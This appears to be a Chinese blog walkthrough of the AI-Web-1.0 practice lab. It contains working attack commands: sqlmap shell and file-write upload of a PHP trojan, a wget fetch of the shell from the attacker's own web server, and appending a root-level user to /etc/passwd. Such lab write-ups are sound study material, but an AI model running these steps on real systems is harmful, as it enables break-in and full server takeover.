云尘-AI-Web-1.0

最新推荐文章于 2024-08-18 11:38:57 发布
最新推荐文章于 2024-08-18 11:38:57 发布
阅读量246 收藏
点赞数
分类专栏: 渗透 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134125637
版权

继续!

开扫

继续先测试web

sql注入 直接sqlmap跑

通过注入 (sqlmap查询方式省略)

存在systemuser 不知道会不会是电脑的密码 我们解密一下然后直接试试看

然后失败 这里就没有思路了 但是我们刚刚存在一个目录 我们再扫扫看

无果 换另一个目录

扫出来了 /m3diNf0/info.php 去看看

这下就开朗了

因为这里可以获取 绝对路径 那么我们就可以直接通过 sqlmap进行getshell 这里介绍三种

第一种 --os-shell

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

我们就getshell了

第二种  --file-write

一样是通过sqlmap

来上传文件 首先写一个木马

然后通过

--file-write 木马文件 --file-dest 存放目录

上传文件

py3 .\sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --file-write C:\Users\Administrator\Desktop\1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

上传失败 但是学到了

第三种 wegt

首先就是本机开启web服务

用py即可

py3 -m http.server 8888

开启 服务后 去sqlmap的shell 中下载即可

 wget http://10.8.0.174:8888//1.php

这里因为是靶场 所以找不到本身 的ip 后面发现在openvpn里存在

这里就成功

然后我们链接后查看一下 如何提权

首先就是查看/etc/passwd的权限

-rw-r--r-- 1 www-data www-data 1664 Aug 21  2019 /etc/passwd

发现 有w 可写 那么我们就通过 openssl 伪造一下

openssl passwd -1 -salt hack 123456

然后我们看看root怎么写的

root:x:0:0:root:/root:/bin/bash

x为密码 就是上面生成的

hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0:root:/root:/bin/bash

然后通过echo写入

echo 'hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash' >> /etc/passwd

sudo hack 会报错

我们使用py命令

python -c 'import pty;pty.spawn("/bin/bash")'

但是最后无法实现 靶机被打坏了。。。。。

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AI-WEB-1.0
底层社会中的弱智
08-03 628
总结: 报错注入常见的十种,本次用的是updatexml 获取os-sh的条件,具有可写权限的绝对路径需要自己拼接 使用openssl passwd -1 salt xxx xxx构造hash 目标主机为192.168.49.158 攻击kali机为192.168.49.129 前期的信息收集,端口服务,目录扫描,web框架等 端口服务: 只开放80端口且存在两个目录 访问web页面,使用nikto和dirb针对主机和目录进行探测: 主页和前端源码没有提供信息 查看下目录
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2535
AI-WEB-1.0靶机的简单攻略
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2894
AI-WEB-1.0 多方法渗透
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 518
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
vulnhub靶机AI-WEB-1.0渗透测试
Long_gone的博客
09-29 1609
首先用netdiscover工具扫描一下靶机IP: netdiscover 由经验推断出靶机IP为:192.168.34.228,接着使用nmap工具扫描一下靶机端口的开放情况: nmap -sV -p 0-65535 192.168.34.228 发现靶机只开放了80端口,然后访问一下看看: 然后试一下目录爆破: dirb http://192.168.34.228 发现robot...
云尘靶场-AI-Web-1.0
2202_75317918的博客
11-21 150
还是先用fscan来扫c段访问一下/robots.txt访问一下看看 ,不能访问删掉/upload输个1 试试1' 发现报错了这里我们可以发现是post传参,那么sqlmap执行POST注入的方式这里检查网络,看请求,可以看到传参放到sqlmap说明存在sql注入这里没有flag,也不懂有什么用访问另一个看看也是打不开,用dirsearch扫一下看看。
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1417
vulnhub靶机AI-Web-1.0渗透笔记
云尘-Node1 js代码
m0_64180167的博客
11-02 937
还以为直接getshell了 老演员了 其实只是302跳转 所以我们无视 只有一个站 直接看就行了。这账号密码不就出来了 看看这个是啥加密 多半是hash 我们使用hash识别看看。扫出来了两个目录 但是没办法 都是要跳转 说明还是需要登入才可以。差不多就是base64解密 然后通过 file 识别为zip。然后再 去 app.js中查看ssh链接。然后通过爆破zip密码 获取源代码。源代码中也没有提示 奇了怪了。然后顺便fscan扫一下咯。可能是256 去解密看看。然后下载的时候靶场炸了。
netlimiter-4.0.41.0
01-03
netlimiter 4是最新版本的带宽分享和控制工具,可以有效地控制服务器或者个人计算机的带宽分配和控制,同时还可以有效地查看上行和下载带宽,让你对服务器的带宽有所了解。
虚幻4-4.15.1版本-创建物体及子弹发射
04-07
在虚幻4(UE4)引擎的4.15.1版本中,创建物体和实现子弹发射是一项基础但至关重要的技能,特别是在制作游戏时。以下将详细解释如何通过蓝图系统来实现这一功能。 首先,我们要创建一个物体。在这个示例中,我们将...
煤矿井下静电产生、危害及安全防护
07-11
3. **煤尘、岩尘静电**:采煤机工作时激起的煤尘和岩尘,以及爆破产生的烟尘都可能带有电荷,形成带电云尘。 4. **液体喷雾静电**:喷浆、喷水、净化喷雾等操作中形成的雾滴以及喷嘴等部件也可能带有较高的静电。 ...
Prostgresql的Timescaledb插件/扩展部署
weixin_45697805的博客
08-14 246
背景:研发需求,需要把docker部署得postgresql迁移到新的节点并要求再本地部署,提前查看数据库需要那些插件,并进行安装,docker部署的默认有插件。
4.1 SQL的起源与发展
在路上的专栏
08-16 874
SQL(结构化查询语言)是数据库管理的基石,自20世纪70年代诞生以来,它不断发展和演化,成为全球最广泛使用的数据查询语言。本文将通过生动的故事和易于理解的语言,带你了解SQL的起源、发展历程及其对现代数据库管理的深远影响。文章内容既适合数据库新手,也对专业人士具有参考价值。
SQL - 基础大汇总
心如冰清,天塌不惊
08-16 409
【代码】数据库 - 基础。
SQL - 多表查询
最新发布
心如冰清,天塌不惊
08-18 288
【代码】SQL - 多表查询。
SQLALchemy 数据的 CRUD 操作
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
08-15 309
SQLAlchemy 是一个流行的 SQL 工具包和对象关系映射(ORM)库,用于 Python。它提供了一个高级接口来与数据库交互,允许开发者通过 Python 对象来执行 CRUD(创建、读取、更新、删除)操作,而无需编写大量的 SQL 语句。
浅谈SQL Server、Oracle和MySQL
a876106354的博客
08-15 719
SQL Server 是Microsoft公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点,可跨越从运行MicrosoftWindows 98的膝上型电脑到运行2012 的大型多处理器的服务器等多种平台使用。Microsoft SQL Server 是一个全面的数据库平台,使用集成的商业智能(BI)工具提供了企业级的数据管理。数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,使您可以构建和管理用于业务的高可用和高性能的数据应用程序。MySQL是一个。
鸿萌数据恢复服务:SQL Server 中的 GAM、SGAM、IAM,及数据库损坏的修复方法
sanyuan7783的博客
08-16 941
全局分配映射 (GAM) 负责处理数据库内的分配区,有助于在需要时识别空闲区。共享分配映射 (SGAM) 页类似于粒度图,处理数据库中特定文件组的扩展分配。索引分配映射 (IAM) 页是特殊的内部页,其作用类似于数据存储的注册表,跟踪数据页在数据库文件中的位置。
使用现有的 bitnami/postgresql:16.3.0 镜像安装pg_roaringbitmap插件
美味小鱼的杂货铺
08-14 277
你应该能看到 roaringbitmap 在已安装的扩展列表中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值